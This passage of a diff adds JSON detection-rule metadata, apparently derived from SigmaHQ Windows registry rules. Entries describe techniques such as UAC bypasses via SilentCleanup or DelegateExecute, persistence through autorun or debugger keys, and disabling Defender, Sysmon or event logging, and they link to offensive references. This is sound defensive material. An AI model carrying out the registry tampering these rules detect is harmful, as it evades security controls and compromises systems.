"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": 
"18f2065c-d36c-464a-a748-bcf909acb2e3", + "value": "Wow6432Node Classes Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", + "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" + }, + { + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "meta": { + "author": "frack113", + "creation_date": "2022/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_blackbyte_ransomware.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "83314318-052a-4c90-a1ad-660ece38d276", + "value": "Blackbyte Ransomware Registry" + }, + { + "description": "Bypasses User Account Control using a fileless method", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_delegateexecute.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "value": "Bypass UAC Using DelegateExecute" + }, + { + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_eventviewer.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "value": "Bypass UAC Using Event Viewer" + }, + { + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", + "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", + "value": "Bypass UAC Using SilentCleanup Task" + }, + { + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ 
+ "Unknown" + ], + "filename": "registry_set_change_rdp_port.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", + "value": "Changing RDP Port to Non Standard Number" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_change_security_zones.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", + "value": "IE Change Domain Zone" + }, + { + "description": "Detects changes in Sysmon driver altitude. 
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "meta": { + "author": "B.Talebi", + "creation_date": "2022/07/28", + "falsepositive": [ + "Legitimate driver altitude change to hide sysmon" + ], + "filename": "registry_set_change_sysmon_driver_altitude.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", + "https://youtu.be/zSihR3lTf7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "value": "Disable Sysmon Event Logging Via Registry" + }, + { + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "meta": { + "author": "frack113", + "creation_date": "2022/09/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_change_winevt_channelaccess.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "value": "Change Winevt Event Access Permission Via Registry" + }, + { + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "meta": { + 
"author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_chm_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "CHM Helper DLL Persistence" + }, + { + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_chrome_extension.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1133" + ] + }, + "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule 
is based on a regular sysmon's events.\n", + "meta": { + "author": "Wojciech Lesicki", + "creation_date": "2021/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_cobaltstrike_service_installs.yml", + "level": "critical", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "value": "CobaltStrike Service Installations in Registry" + }, + { + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "meta": { + "author": "Omkar Gudhate", + "creation_date": "2020/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_comhijack_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", + "https://www.exploit-db.com/exploits/47696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ] + }, + "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", + "value": "COM Hijack via Sdclt" + }, + { + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2022/02/24", + "falsepositive": [ + "Legitimate disabling of crashdumps" + ], + "filename": "registry_set_crashdump_disabled.yml", + "level": "medium", + "logsource.category": "registry_set", + 
"logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" + ], + "tags": [ + "attack.t1564", + "attack.t1112" + ] + }, + "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "value": "CrashControl CrashDump Disabled" + }, + { + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_creation_service_susp_folder.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "value": "Service Binary in Suspicious Folder" + }, + { + "description": "Detect the creation of a service with a service binary located in a uncommon directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_creation_service_uncommon_folder.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": 
"277dc340-0540-42e7-8efb-5ff460045e07", + "value": "Service Binary in Uncommon Folder" + }, + { + "description": "Detects the abuse of custom file open handler, executing powershell", + "meta": { + "author": "CD_R0M_", + "creation_date": "2022/06/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "value": "Custom File Open Handler Executes PowerShell" + }, + { + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "meta": { + "author": "EagleEye Team, Florian Roth, NVISO", + "creation_date": "2020/05/13", + "falsepositive": [ + "New printer port install on host" + ], + "filename": "registry_set_cve_2020_1048_new_printer_port.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)" + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat 
group Sourgum", + "meta": { + "author": "Sittikorn S, frack113", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", + "level": "critical", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ] + }, + "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits" + }, + { + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2020/05/31", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ] + }, + "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the 
\"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "frack113", + "creation_date": "2022/08/07", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "filename": "registry_set_dbgmanageddebugger_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574" + ] + }, + "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "value": "Add Debugger Entry To DbgManagedDebugger For Persistence" + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/07/06", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_defender_exclusions.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "value": "Windows Defender Exclusions Added - Registry" + }, + { + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + 
"filename": "registry_set_dhcp_calloutdll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "value": "DHCP Callout DLL Installation" + }, + { + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "value": "Disable Exploit Guard Network Protection on Windows Defender" + }, + { + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/04", + "falsepositive": [ + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + ], + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", + "level": "high", + 
"logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "value": "Disabled Windows Defender Eventlog" + }, + { + "description": "Detects disabling Windows Defender PUA protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "value": "Disable PUA Protection on Windows Defender" + }, + { + "description": "Detects disabling Windows Defender Tamper Protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", + "value": "Disable Tamper Protection on Windows Defender" + }, + { + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_administrative_share.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "value": "Disable Administrative Share Creation at Startup" + }, + { + "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_autologger_sessions.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "value": 
"AutoLogger Sessions Tamper" + }, + { + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_defender_firewall.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "value": "Disable Microsoft Defender Firewall via Registry" + }, + { + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_disable_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", + "value": "Disable Internal Tools or Feature in Registry" 
+ }, + { + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_macroruntimescanscope.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", + "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "value": "Disable Macro Runtime Scan Scope" + }, + { + "description": "Disable Microsoft Office Security Features by registry", + "meta": { + "author": "frack113", + "creation_date": "2021/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_microsoft_office_security_features.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": 
"7c637634-c95d-4bbf-b26c-a82510874b34", + "value": "Disable Microsoft Office Security Features" + }, + { + "description": "Detects registry modifications that disable Privacy Settings Experience", + "meta": { + "author": "frack113", + "creation_date": "2022/10/02", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_disable_privacy_settings_experience.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "value": "Disable Privacy Settings Experience in Registry" + }, + { + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": 